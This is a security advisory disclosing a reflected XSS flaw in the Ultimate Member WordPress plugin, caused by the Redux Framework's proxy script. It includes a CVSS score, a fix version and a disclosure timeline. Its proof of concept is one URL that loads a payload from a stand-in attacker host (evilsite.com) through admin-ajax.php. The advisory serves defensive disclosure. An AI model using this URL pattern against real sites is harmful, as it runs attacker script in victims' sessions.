g0blin Research

Follow @g0blinResearch

Ultimate Member 1.2.98-1.2.997, Reflected XSS

The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this location is then output on the target domain, and as such JavaScript is executed under the context of the current user of the site.

Homepage

https://wordpress.org/plugins/ultimate-member/

CVSS Score

5.8

CSSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 1.3.0

Proof of Concept

If a user of the target site can be tricked into visiting the following URL (the page specified in the ‘url’ parameter would contain your XSS payload), then the HTML/JS within the target page will be executed under the context of the current user. 

http://localhost/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html

Timeline

  • 2015-05-18: Discovered
  • 2015-05-18: Vendor notified
  • 2015-05-18: Vendor responded
  • 2015-06-11: Version 1.2.996 released – issue resolved
  • 2015-06-18: Advisory released
  • 2015-06-22: Notified that issue has in fact not been resolved – Vendor notified
  • 2015-7-07: Version 1.3.0 released – issue resolved (Redux framework updated)